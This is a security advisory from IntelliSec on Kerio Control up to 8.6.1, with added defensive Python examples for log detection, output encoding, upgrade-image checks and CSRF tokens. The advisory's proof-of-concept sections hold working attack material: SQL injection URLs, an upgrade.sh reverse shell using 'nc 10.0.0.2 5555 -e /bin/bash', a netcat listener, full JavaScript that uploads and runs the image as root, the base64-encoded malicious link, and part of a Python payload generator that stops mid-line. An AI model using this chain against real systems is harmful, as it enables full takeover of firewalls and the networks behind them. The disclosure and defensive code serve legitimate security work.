moften

IntelliSec Advisory - Multiple Vulnerabilities in Kerio Cont

Oct 15th, 2015
IntelliSec Security Advisory

==============================================================================================

Title: Multiple Vulnerabilities in Kerio Control (Virtual Appliance)

Vulnerabilities: XSS, SQL Injection, Remote Code Execution through CSRF

Product: Kerio Control
Homepage: http://www.kerio.com
Affected Version: <= 8.6.1
Fixed Version: 8.6.2 (partially fixed)
Impact: critical
Date: 2015-10-12

Author: Raschin Tavakoli | IntelliSec GmbH
http://www.intellisec.at
research@intellisec.at

Links: https://youtu.be/EzTI2WlGHb4

===============================================================================================
Vendor description:
===================

Kerio Control is a unified threat management firewall developed by Kerio Technologies. It
features intrusion prevention, content filtering, activity reporting, bandwidth management,
and virtual private networking. Kerio Control runs Linux, providing network perimeter defense
for small to medium organizations.

Vulnerabilities
===============
1. XSS with Anti-XSS-Filter bypass (nonauth area)
2. SQL Injection (non-admin area)
3. Remote Code Execution (admin area)

By chaining these vulnerabilities together, in combination with user interaction, an attacker may
gain full control over the firewall and the underlying network.

Attack Scenario
===============

The first attack could be to trick non-admin users into following a malicious link in order to trigger
a CSRF exploit via the /nonauth/certificate.php script. The script may, for example, exploit the SQL
Injection flaw in report.php.
Once able to query the database, sensitive data of the users can be transmitted back to the
attacker. Information of interest could be, for example, the traffic usage of admin users and their
top-visited webpages.

In the next attack, this information may be used to embed another CSRF exploit into one of
the top-visited webpages. If the attacker succeeds and the exploit gets triggered by a visiting
admin, arbitrary remote code execution will be gained.
===============================================================================================
1. SQL Injection:
===============================================================================================

Description:
============

Kerio Control suffers from an SQL Injection flaw in the report.php script.

It is not necessary to use blind SQL injection, as the output will be rendered into an image file.
As the text in the image file has a fixed size, multiple UNION SELECTs can be combined to render
multiple images containing the result text of the query.

In order to exploit the issue, a user has to be authenticated. For non-admin users, web reports
have to be enabled.

This issue is fixed in 8.6.2.

Proof of Concept:
=================

GET /report.php?id=1'+OR+'1'%3d'1'%3b+-- HTTP/1.1
Host: testbox:4081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: SESSION_CONTROL_WEBIFACE=c0fa6c207d812da1fce3e2ff2bc2e609948988a041f5a23adb64064a42010e6b;
TOKEN_CONTROL_WEBIFACE

For example, to read out the admin's internal UUID, the following union-based SQL injection
can be used:

https://testbox:4081/report.php?start=16703, 0, 0) UNION SELECT 'x', 'Admin UUID: ' ||
substring(cast( (select UUID from USER_LIST WHERE USERNAME='Admin') as varchar(256))
from 1 for 14), REQUESTS FROM GET_ALL_TOP_WEBS_D(16703, 1) UNION SELECT 'y', substring(cast(
(select UUID from USER_LIST WHERE USERNAME='Admin') as varchar(256)) from 15 for 40), '7'
FROM GET_ALL_TOP_WEBS_D(16703, 1);+--+&end=16703&id=0'+OR+USERNAME='Admin';+--+

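The request shapes shown in the proof of concept above are easy to recognise in the firewall's web-server access log: report.php only ever uses id, start and end as integers, so anything else in those parameters is an injection attempt. The following detector is an added example written for this advisory, not code from IntelliSec or Kerio; the log format, the hostnames and the four log lines are constructed (two of them reproduce the PoC request shapes), and the integer-parameter allowlist is an assumption drawn from the PoC URLs.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not taken from the advisory). Lines 2 and 3
# reproduce the request shapes of the proof of concept; lines 1 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2015:10:00:01 +0200] "GET /report.php?id=1&start=16703&end=16703 HTTP/1.1" 200 5123
10.0.0.9 - - [12/Oct/2015:10:00:07 +0200] "GET /report.php?id=1'+OR+'1'%3d'1'%3b+-- HTTP/1.1" 200 5123
10.0.0.9 - - [12/Oct/2015:10:00:15 +0200] "GET /report.php?start=16703,+0,+0)+UNION+SELECT+'x',+'Admin+UUID:+'+%7C%7C+substring(cast((select+UUID+from+USER_LIST+WHERE+USERNAME='Admin')+as+varchar(256))+from+1+for+14),+REQUESTS+FROM+GET_ALL_TOP_WEBS_D(16703,+1);+--+&end=16703&id=0'+OR+USERNAME='Admin';+--+ HTTP/1.1" 200 5123
10.0.0.5 - - [12/Oct/2015:10:00:20 +0200] "GET /index.php HTTP/1.1" 200 210
"""

# Combined-log-format request line; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# report.php parameters that the application only uses as integers (assumed from the PoC).
NUMERIC_PARAMS = {"id", "start", "end"}

# Cheap SQL-metacharacter heuristic for any other parameter.
SQL_META = re.compile(r"(?i)(['\"]|--|/\*|\bunion\b|\bselect\b)")


def classify_value(key, value):
    """Return a reason string when a decoded parameter value looks injected, else None."""
    if key in NUMERIC_PARAMS:
        return None if value.isdigit() else "non-numeric value in integer parameter"
    if SQL_META.search(value):
        return "SQL metacharacters in parameter"
    return None


def find_injection_attempts(log_text):
    """Scan access-log text and return one finding per suspicious report.php request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != "/report.php":
            continue
        # parse_qsl URL-decodes, so '+' and %xx sequences are resolved before inspection.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            reason = classify_value(key, value)
            if reason:
                findings.append({"src": m.group("src"), "ts": m.group("ts"),
                                 "param": key, "value": value, "reason": reason})
                break  # one finding per request is enough for alerting
    return findings


if __name__ == "__main__":
    for f in find_injection_attempts(SAMPLE_LOG):
        print("%s %s param=%s reason=%s value=%r" %
              (f["ts"], f["src"], f["param"], f["reason"], f["value"][:60]))
```

Decoding before matching matters: the PoC sends `%3d` and `+`, and a pattern applied to the raw request line would have to enumerate every encoding. An integer allowlist for id, start and end also catches payloads that avoid quotes and SQL keywords entirely.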
========================
2. Cross Site Scripting
========================

Description:
============

The server parameter in the nonauth/certificate.php script suffers from a non-persistent XSS
vulnerability. The payload needs to be base64 encoded and is decoded at runtime. That way
it bypasses all Anti-XSS filters of modern browsers, which increases the severity of this issue
significantly.

The issue has been tested with OS X Chrome Version 45.0.2454.101, OS X Safari Version 9.0
(10601.1.56.2), Linux Chromium Version 37.0.2062.120 and Linux Iceweasel 31.8.0.

This issue is fixed in 8.6.2.

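The filter bypass works because a browser's reflected-XSS filter compares the response with the request parameters, and the base64 text in the request does not resemble the decoded tag in the response. The server-side fix is the same as for any reflected value: output-encode after decoding. The following is an added example modelling that flaw and its fix, not Kerio's code and not the advisory's payload; the hostname, the response template and the sample script tag are constructed, and the detection helper shows the same decode-then-inspect step a log review or WAF rule needs.

```python
import base64
import binascii
import html
import re

# Constructed inputs (not the advisory's payload): a legitimate hostname and a
# minimal script tag, both base64-encoded the way the server parameter expects.
BENIGN_SERVER = base64.b64encode(b"fw.example.test").decode("ascii")
INJECTED_SERVER = base64.b64encode(b"<script>alert(document.domain)</script>").decode("ascii")


def decode_server_param(value):
    """Base64-decode the 'server' parameter; anything that is not valid base64 becomes ''."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return ""


def render_vulnerable(server_b64):
    # Models the flaw: the decoded value is placed in the HTML response unchanged,
    # so whatever the base64 hid is interpreted as markup by the browser.
    return "<p>Certificate server: %s</p>" % decode_server_param(server_b64)


def render_hardened(server_b64):
    # Fix: HTML-encode after decoding; the decoded text can no longer become markup.
    return "<p>Certificate server: %s</p>" % html.escape(decode_server_param(server_b64), quote=True)


MARKUP_RE = re.compile(r"(?i)<\s*/?\s*[a-z]|javascript:|\bon[a-z]+\s*=")


def looks_like_injected_markup(server_b64):
    """Detection helper for logs or a WAF: decode first, then look for markup."""
    return MARKUP_RE.search(decode_server_param(server_b64)) is not None


if __name__ == "__main__":
    print(render_vulnerable(INJECTED_SERVER))
    print(render_hardened(INJECTED_SERVER))
    print(looks_like_injected_markup(INJECTED_SERVER), looks_like_injected_markup(BENIGN_SERVER))
```

Any rule that inspects the server parameter without decoding it first sees only base64 text and learns nothing, which is exactly why the browser-side filters fail here.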
===============================================================================================
3. Remote Command Execution via File Upload
===============================================================================================

Description:
============

The Kerio Control upgrade function in the admin interface suffers from an RCE vulnerability.
A malicious shell script can be uploaded and executed with root privileges. This can be done by
simply renaming a tar file to the extension .img. If this tar file contains an upgrade.sh shell
script, this script will be executed with root privileges.

Kerio has not yet provided a fix for the upgrade functionality.

The Kerio admin interface by itself neither provides a functionality to execute shell commands
on the underlying Linux system nor a possibility to enable SSH. SSH is disabled by default and
can only be enabled through the Kerio Console Application.

Moreover, this issue becomes critical if it is combined with a CSRF attack.

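Since the upgrade path is reported as unfixed, the control a defender wants in front of it is authenticity checking before anything inside the image runs: the uploaded file is matched against a trusted manifest of vendor digests, and the archive is listed so that the scripts it would execute and any unsafe paths are logged. The following is an added example of that gate, not Kerio's or IntelliSec's code; the manifest, its digest value, the in-memory image builder and the script body are constructed, and the rule that a .sh file or any executable member would run is an assumption taken from the description above.

```python
import hashlib
import io
import tarfile

# Constructed manifest of approved upgrade images (hypothetical digest). In a real
# deployment this list comes from the vendor and is itself signature-checked.
APPROVED_IMAGE_DIGESTS = {
    "example-8.6.2": "0000000000000000000000000000000000000000000000000000000000000000",
}


def build_tar_gz(members):
    """Test fixture: build an in-memory tar.gz from {path: bytes}, members marked executable."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mode = 0o755
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def inspect_upgrade_image(image_bytes, approved_digests=APPROVED_IMAGE_DIGESTS):
    """Decide whether an uploaded .img may be applied, before anything in it runs.

    Returns the image digest, the members that would be executed, the reasons
    for refusal (empty when approved) and the verdict. Listing is done with
    getmembers() only; nothing is extracted."""
    digest = hashlib.sha256(image_bytes).hexdigest()
    reasons = []
    scripts = []
    if digest not in approved_digests.values():
        reasons.append("digest not in trusted manifest")
    try:
        with tarfile.open(fileobj=io.BytesIO(image_bytes), mode="r:gz") as tar:
            for member in tar.getmembers():
                parts = member.name.split("/")
                if member.name.startswith("/") or ".." in parts:
                    reasons.append("unsafe path: %s" % member.name)
                if member.isfile() and (member.name.endswith(".sh") or member.mode & 0o111):
                    scripts.append(member.name)
    except tarfile.TarError:
        reasons.append("not a tar archive")
    return {"digest": digest, "scripts": scripts, "reasons": reasons, "approved": not reasons}


if __name__ == "__main__":
    # Constructed image shaped like the one described above: a tarball holding
    # an upgrade.sh, renamed to .img. The script body is harmless.
    image = build_tar_gz({"upgrade.sh": b"#!/bin/sh\necho 'constructed test image'\n"})
    print(inspect_upgrade_image(image))
```

The digest check is the actual gate; the member listing is for the audit log, so that an operator can see after the fact which script an accepted image ran as root.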
========================================
4. Remote Command Execution through CSRF
========================================

Description:
============

If a user with an authenticated admin session can be tricked into following a specially crafted link
(containing the base64 encoded payload), complete control over the firewall can be gained.

Proof of Concept:
=================

Create a Bash Script:
---------------------
# cat upgrade.sh
# #!/bin/bash
# nc 10.0.0.2 5555 -e /bin/bash &

# tar czf upgrade.tar.gz *
# mv upgrade.tar.gz upgrade.img

Open a netcat listener on the attacker's machine 10.0.0.2:
----------------------------------------------------------
# nc -lvp 5555

Generate Javascript Payload (File Upload and Execution):
--------------------------------------------------------
<script>
url='http://10.0.0.1:4081/admin';
_token="";
_file="";
_id = "";
function reqListener () {
    obj = JSON.parse(this.responseText);
    file = obj.result.fileUpload.name;
    id = obj.result.fileUpload.id;
    createIFrame(file, id);
}
function createIFrame(file, id) {
    iframe=document.createElement("iframe");
    iframe.src=url + "/constants.js.php";
    iframe.style.display = "none";
    iframe.sandbox="allow-scripts allow-same-origin";
    iframe.onload=function() {
        cookie = iframe.contentWindow.document.cookie;
        var re = new RegExp(name + "=([^;]+)");
        var value = re.exec(cookie);
        var token=(value != null) ? unescape(value[1]) : null;
        executeScript(file, id, token);
    }
    document.body.appendChild(iframe);
}
function executeScript(file, id, token) {
    _file = file;
    _id = id;
    _token = token;
    var xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url + "/api/jsonrpc/", true);
    xmlhttp.setRequestHeader("X-Token", token);
    xmlhttp.addEventListener("load", executeScript2);
    xmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");
    xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
    xmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.uploadImage","params":{"fileId": file}}));
}
function executeScript2(file, token) {
    var xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url +"/api/jsonrpc/", true);
    xmlhttp.setRequestHeader("X-Token", _token);
    xmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");
    xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
    xmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.performCustomUpgrade","params":{"id": _id }}));
}
var xhr = new XMLHttpRequest();
xhr.open("POST", url + "/api/jsonrpc/upload/", true);
xhr.addEventListener("load", reqListener);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1038495162429835808207612951");
xhr.withCredentials = true;
var body = "-----------------------------1038495162429835808207612951\r\n" +
    "Content-Disposition: form-data; name=\"uploadImage\"; filename=\"upgrade.img\" \r\n" +
    "Content-Type: application/octet-stream\r\n" +
    "\r\n" +
    "\x1f\x8b\x08\x00\xe0\x6e\x02\x56\x00\x03\xed\xce\xb1\x0e\x82\x30\x10\xc6\xf1\xce\x3c\xc5\x19\x13\x37\xe1\x8a\x2d\x3e\x4f\x51\x22\x2e\x60\x5a\x78\x7f\xab\x83\x24\x0e\x3a\x11\x63\xf2\xff\xdd\xf0\x25\xf7\xdd\x70\xf3\xed\x12\xc3\xb9\x2b\x53\x6f\x56\xa3\x59\xe3\xdc\x33\xb3\xf7\x54\xf5\xce\xd8\xba\x51\x75\xcd\xf1\xe0\xf2\xde\x5a\x9f\x43\x74\xbd\x97\x16\x73\x9a\x42\x14\x31\x71\x1c\xa7\x4f\x77\xdf\xfa\x3f\xb5\xdd\x54\xed\x75\xa8\xda\x90\xfa\x62\x38\x89\xd5\xf2\x31\xb5\xf8\x4c\xf6\x9d\xbc\x5a\xd9\x15\xbf\xfe\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xb8\x03\x94\x67\x18\xfa\x00\x28\x00\x00\r\n" +
    "-----------------------------1038495162429835808207612951--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
</script>

Base64 encode and craft the malicious link:

https://testbox:4081/nonauth/certificate.php?server=PHNjcmlwdD4KdXJsPSdodHRwOi8vMTAuMC4wLjE6NDA4MS9hZG1pbic7Cl90b2tlbj0iIjsKX2Zp
bGU9IiI7Cl9pZCA9ICIiOwpmdW5jdGlvbiByZXFMaXN0ZW5lciAoKSB7CglvYmogPSBKU09OLnBh
cnNlKHRoaXMucmVzcG9uc2VUZXh0KTsKCWZpbGUgPSBvYmoucmVzdWx0LmZpbGVVcGxvYWQubmFt
ZTsKCWlkID0gb2JqLnJlc3VsdC5maWxlVXBsb2FkLmlkOwoJY3JlYXRlSUZyYW1lKGZpbGUsIGlk
KTsKfQpmdW5jdGlvbiBjcmVhdGVJRnJhbWUoZmlsZSwgaWQpIHsKCWlmcmFtZT1kb2N1bWVudC5j
cmVhdGVFbGVtZW50KCJpZnJhbWUiKTsKCWlmcmFtZS5zcmM9dXJsICsgIi9jb25zdGFudHMuanMu
cGhwIjsKCWlmcmFtZS5zdHlsZS5kaXNwbGF5ID0gIm5vbmUiOwoJaWZyYW1lLnNhbmRib3g9ImFs
bG93LXNjcmlwdHMgYWxsb3ctc2FtZS1vcmlnaW4iOwoJaWZyYW1lLm9ubG9hZD1mdW5jdGlvbigp
IHsKCQljb29raWUgPSBpZnJhbWUuY29udGVudFdpbmRvdy5kb2N1bWVudC5jb29raWU7CgkJdmFy
IHJlID0gbmV3IFJlZ0V4cChuYW1lICsgIj0oW147XSspIik7CgkJdmFyIHZhbHVlID0gcmUuZXhl
Yyhjb29raWUpOwoJCXZhciB0b2tlbj0odmFsdWUgIT0gbnVsbCkgPyB1bmVzY2FwZSh2YWx1ZVsx
XSkgOiBudWxsOwoJCWV4ZWN1dGVTY3JpcHQoZmlsZSwgaWQsIHRva2VuKTsKCX0KCWRvY3VtZW50
LmJvZHkuYXBwZW5kQ2hpbGQoaWZyYW1lKTsKfQpmdW5jdGlvbiBleGVjdXRlU2NyaXB0KGZpbGUs
IGlkLCB0b2tlbikgewoJX2ZpbGUgPSBmaWxlOwoJX2lkID0gaWQ7CglfdG9rZW4gPSB0b2tlbjsK
CXZhciB4bWxodHRwPW5ldyBYTUxIdHRwUmVxdWVzdCgpO3htbGh0dHAub3BlbigiUE9TVCIsIHVy
bCArICIvYXBpL2pzb25ycGMvIiwgdHJ1ZSk7Cgl4bWxodHRwLnNldFJlcXVlc3RIZWFkZXIoIlgt
VG9rZW4iLCB0b2tlbik7Cgl4bWxodHRwLmFkZEV2ZW50TGlzdGVuZXIoImxvYWQiLCBleGVjdXRl
U2NyaXB0Mik7Cgl4bWxodHRwLnNldFJlcXVlc3RIZWFkZXIoIlgtUmVxdWVzdGVkLVdpdGgiLCAi
WE1MSHR0cFJlcXVlc3QiKTsKCXhtbGh0dHAuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBl
IiwgImFwcGxpY2F0aW9uL2pzb247Y2hhcnNldD1VVEYtOCIpOwoJeG1saHR0cC5zZW5kKEpTT04u
c3RyaW5naWZ5KHsianNvbnJwYyI6IjIuMCIsImlkIjoxLCJtZXRob2QiOiJVcGRhdGVDaGVja2Vy
LnVwbG9hZEltYWdlIiwicGFyYW1zIjp7ImZpbGVJZCI6IGZpbGV9fSkpOwp9CmZ1bmN0aW9uIGV4
ZWN1dGVTY3JpcHQyKGZpbGUsIHRva2VuKSB7Cgl2YXIgeG1saHR0cD1uZXcgWE1MSHR0cFJlcXVl
c3QoKTt4bWxodHRwLm9wZW4oIlBPU1QiLCB1cmwgKyIvYXBpL2pzb25ycGMvIiwgdHJ1ZSk7Cgl4
bWxodHRwLnNldFJlcXVlc3RIZWFkZXIoIlgtVG9rZW4iLCBfdG9rZW4pOwoJeG1saHR0cC5zZXRS
ZXF1ZXN0SGVhZGVyKCJYLVJlcXVlc3RlZC1XaXRoIiwgIlhNTEh0dHBSZXF1ZXN0Iik7Cgl4bWxo
dHRwLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi9qc29uO2No
YXJzZXQ9VVRGLTgiKTsKCXhtbGh0dHAuc2VuZChKU09OLnN0cmluZ2lmeSh7Impzb25ycGMiOiIy
LjAiLCJpZCI6MSwibWV0aG9kIjoiVXBkYXRlQ2hlY2tlci5wZXJmb3JtQ3VzdG9tVXBncmFkZSIs
InBhcmFtcyI6eyJpZCI6IF9pZCB9fSkpOwp9CnZhciB4aHIgPSBuZXcgWE1MSHR0cFJlcXVlc3Qo
KTsKeGhyLm9wZW4oIlBPU1QiLCB1cmwgKyAiL2FwaS9qc29ucnBjL3VwbG9hZC8iLCB0cnVlKTsK
eGhyLmFkZEV2ZW50TGlzdGVuZXIoImxvYWQiLCByZXFMaXN0ZW5lcik7Cnhoci5zZXRSZXF1ZXN0
SGVhZGVyKCJBY2NlcHQiLCAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNh
dGlvbi94bWw7cT0wLjksKi8qO3E9MC44Iik7Cnhoci5zZXRSZXF1ZXN0SGVhZGVyKCJBY2NlcHQt
TGFuZ3VhZ2UiLCAiZW4tVVMsZW47cT0wLjUiKTsKeGhyLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRl
bnQtVHlwZSIsICJtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0xMDM4NDk1MTYyNDI5ODM1ODA4MjA3NjEyOTUxIik7Cnhoci53aXRoQ3JlZGVu
dGlhbHMgPSB0cnVlOwp2YXIgYm9keSA9ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTEw
Mzg0OTUxNjI0Mjk4MzU4MDgyMDc2MTI5NTFcclxuIiArIAoiQ29udGVudC1EaXNwb3NpdGlvbjog
Zm9ybS1kYXRhOyBuYW1lPVwidXBsb2FkSW1hZ2VcIjsgZmlsZW5hbWU9XCJ1cGdyYWRlLmltZ1wi
IFxyXG4iICsgCiJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbVxyXG4iICsg
CiJcclxuIiArIAoiXHgxZlx4OGJceDA4XHgwMFx4YWJceDZmXHgwMlx4NTZceDAwXHgwM1x4ZWRc
eGNlXHhiMVx4MGVceDgyXHg0MFx4MTBceDg0XHhlMVx4YWJceDc5XHg4YVx4MzVceDI2XHg3Nlx4
YzJceDFlXHhkZVx4MWRceGNmXHgwM1x4NGFceGM0XHgwNlx4Y2NceDFkXHhiY1x4M2ZceDY4XHgy
MVx4ODlceDg1XHg1Nlx4YzRceDk4XHhmY1x4ZGZceDE2XHg1M1x4Y2NceDE2XHgzM1x4ZGRceGFm
XHhiMVx4YmVceGI0XHg3OVx4ZWFceGNjXHg2Nlx4NzRceDExXHg5Y1x4N2JceGU2XHhlMlx4M2Rc
eDU1XHhiZFx4MzNceGI2XHgwY1x4YWFceDJlXHg1NFx4YzFceDlmXHg4Y1x4NWFceGViXHg1ZFx4
NjVceDQ0XHhiN1x4OWJceGI0XHg5YVx4ZDJceDU4XHg0N1x4MTFceDEzXHg4N1x4NjFceGZjXHhm
NFx4ZjdceGFkXHhmZlx4NTNceGZiXHg1ZFx4ZDFceGRjXHhmYVx4YTJceGE5XHg1M1x4OTdceGY1
XHg2N1x4YjFceDlhXHgzZlx4YWVceDE0XHhiZlx4OTBceDYzXHgyYlx4YWZceDU2XHgwZVx4ZDlc
eGFmXHhiN1x4MDJceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4
MDBceDAwXHg1Nlx4MzNceGNmXHhiMlx4M2JceDZjXHgwMFx4MjhceDAwXHgwMFxyXG4iICsgCiIt
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTEwMzg0OTUxNjI0Mjk4MzU4MDgyMDc2MTI5NTEt
LVxyXG4iOwp2YXIgYUJvZHkgPSBuZXcgVWludDhBcnJheShib2R5Lmxlbmd0aCk7CmZvciAodmFy
IGkgPSAwOyBpIDwgYUJvZHkubGVuZ3RoOyBpKyspCmFCb2R5W2ldID0gYm9keS5jaGFyQ29kZUF0
KGkpOyAKeGhyLnNlbmQobmV3IEJsb2IoW2FCb2R5XSkpOwo8L3NjcmlwdD4K


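Two details of the JavaScript above are worth reading as a defender. The multipart upload to /api/jsonrpc/upload/ is sent with cookies only (withCredentials) and no X-Token, while the two JSON-RPC calls that follow do carry X-Token; and the token is obtained by reading document.cookie from a same-origin iframe, which only works because the XSS already runs on the appliance's origin. The following is an added example, not Kerio's code, of the server-side policy that closes the first gap: every state-changing endpoint, the upload included, requires a token bound to the session and compared in constant time, with an Origin check as defence in depth. The origin value, the request dictionaries and the session store are constructed; the cookie name and endpoint paths are those visible in the advisory.

```python
import hmac
import secrets

# Origin of the appliance's own admin UI (constructed value).
SITE_ORIGIN = "https://fw.example.test:4081"

# Endpoints from the advisory's exploit that change server state. The upload
# endpoint must be on this list: the exploit posts the image to it with cookies
# only and attaches X-Token solely to the later JSON-RPC calls.
STATE_CHANGING = {"/api/jsonrpc/", "/api/jsonrpc/upload/"}

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def new_session(store):
    """Create a session and bind a fresh anti-CSRF token to it server-side (ASCII hex)."""
    sid = secrets.token_hex(32)
    store[sid] = secrets.token_hex(32)
    return sid


def authorize(request, store):
    """Return (allowed, reason) for a request dict with method, path, cookies and headers."""
    if request["method"] in SAFE_METHODS:
        return True, "read-only request"
    session_id = request["cookies"].get("SESSION_CONTROL_WEBIFACE", "")
    expected_token = store.get(session_id)
    if expected_token is None:
        return False, "no authenticated session"
    if request["path"] not in STATE_CHANGING:
        return True, "not a state-changing endpoint"
    presented = request["headers"].get("X-Token", "")
    # Constant-time comparison against the token bound to *this* session, not
    # merely "a token is present": a forged request cannot guess it.
    if not hmac.compare_digest(presented, expected_token):
        return False, "missing or wrong X-Token"
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False, "cross-site Origin: %s" % origin
    return True, "ok"


def demo():
    """Constructed requests against the upload endpoint; returns the verdicts by case."""
    store = {}
    sid = new_session(store)
    base = {"method": "POST", "path": "/api/jsonrpc/upload/",
            "cookies": {"SESSION_CONTROL_WEBIFACE": sid}}
    return {
        "upload_without_token": authorize(dict(base, headers={}), store),
        "upload_with_token": authorize(dict(base, headers={"X-Token": store[sid]}), store),
        "cross_site_with_token": authorize(
            dict(base, headers={"X-Token": store[sid], "Origin": "https://attacker.example"}), store),
        "no_session": authorize(dict(base, cookies={}, headers={"X-Token": "x"}), store),
    }


if __name__ == "__main__":
    for case, verdict in demo().items():
        print("%-24s %s" % (case, verdict))
```

This check stops a plain cross-site upload. It does not stop the chain in the advisory, because script running on the appliance's own origin can read the token cookie and satisfies both the token and the Origin test; the XSS fix in 8.6.2 is what actually breaks the chain, and the token policy is the layer that keeps the upgrade endpoint closed to the next reflected-script bug.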
Python 3 payload generator
==========================
For easier testing, we developed a small python script that can be used to
generate the payload:

#!/usr/bin/python

# ====================================================================== #
# Title: Remote Command Execution through CSRF - Payload Generator       #
# Author: Raschin Tavakoli - IntelliSec GmbH                             #
# Date: 12.10.2015                                                       #
#                                                                        #
# Description:                                                           #
# This python3 script generates the payload to exploit the RCE via CSRF  #
# vulnerability in the Kerio Control Virtual Appliance.                  #
#                                                                        #
# First a shell script will be packed as a Kerio upgrade.img file. Then  #
# a Javascript will be generated which uploads the file via the Kerio    #
# upgrade function. The payload will then be base64 encoded and can be   #
# injected into the server parameter of the                              #
# nonauth/certificate.php script ().                                     #
#                                                                        #
# Example Usage:                                                         #
# csrf-gen-payload.py -t https://10.0.0.8:4081/admin -l 10.0.0.7 -p 5555 #
# ====================================================================== #

import os
import shutil
import base64
import argparse
import subprocess
from optparse import OptionParser
import codecs
import sys

tmpdir = "/tmp/kerio_upgrade"

def usage():
    print("\nUsage: csrf-gen-payload -f <file> -t <target-url> \n")
    print("Example: csrf-gen-payload.py -f upgrade.sh -t https://10.0.0.8:4081/admin \n")
    exit()

def main():

    parser = OptionParser()
    parser.add_option("-f", "--file", dest="file",
                      help="the bash file for remote execution", metavar="TARGET")
    parser.add_option("-t", "--target", dest="target_url",
                      help="specify the target url", metavar="TARGET")

    (options, args) = parser.parse_args()

    file = options.file
    target_url = options.target_url

    if not target_url or not file:
        usage()

    # ====================================================================== #
    # Create upgrade.img file                                                #
    # ====================================================================== #
    orgdir = os.path.dirname(os.path.realpath(__file__))

    try:
        if os.path.exists(tmpdir):
            shutil.rmtree(tmpdir)
    except:
        print("Cannot clean " + tmpdir)

    os.mkdir(tmpdir)

    shutil.copy(file, tmpdir + os.path.sep + "upgrade.sh")
    os.chdir(tmpdir)
    os.system("tar czf upgrade.tar.gz *")
    src = os.path.join(tmpdir, "upgrade.tar.gz")
    dst = os.path.join(tmpdir, "upgrade.img")
    os.rename(src, dst)

    f = open('upgrade.img', 'rb',)
    bin_data = f.read()
    f.close()

    # Python 3: iterating bytes yields ints, so each byte becomes a "\xNN" escape.
    hexdata = "".join("\\x{:02x}".format(c) for c in bin_data)

    # ====================================================================== #
    # Generate Javascript Payload                                            #
    # ====================================================================== #
    script = ('<script>\n' +
              'url=\'' + target_url +
              '\';\n' +
              '_token="";\n' +
              '_file="";\n' +
              '_id = "";\n' +
              'function reqListener () {\n' +
              '\tobj = JSON.parse(this.responseText);\n' +
              '\tfile = obj.result.fileUpload.name;\n' +
              '\tid = obj.result.fileUpload.id;\n' +
              '\tcreateIFrame(file, id);\n' +
              '}\n' +
              'function createIFrame(file, id) {\n' +
              '\tiframe=document.createElement("iframe");\n' +
              '\tiframe.src=url + "/constants.js.php";\n' +
              '\tiframe.style.display = "none";\n' +
              '\tiframe.sandbox="allow-scripts allow-same-origin";\n' +
              '\tiframe.onload=function() {\n' +
              '\t\tcookie = iframe.contentWindow.document.cookie;\n' +
              '\t\tvar re = new RegExp(name + "=([^;]+)");\n' +
              '\t\tvar value = re.exec(cookie);\n' +
              '\t\tvar token=(value != null) ? unescape(value[1]) : null;\n' +
              '\t\texecuteScript(file, id, token);\n' +
              '\t}\n' +
              '\tdocument.body.appendChild(iframe);\n' +
              '}\n' +
              'function executeScript(file, id, token) {\n' +
              '\t_file = file;\n' +
              '\t_id = id;\n' +
              '\t_token = token;\n' +
              '\tvar xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url + "/api/jsonrpc/", true);\n' +
              '\txmlhttp.setRequestHeader("X-Token", token);\n' +
              '\txmlhttp.addEventListener("load", executeScript2);\n' +
              '\txmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");\n' +
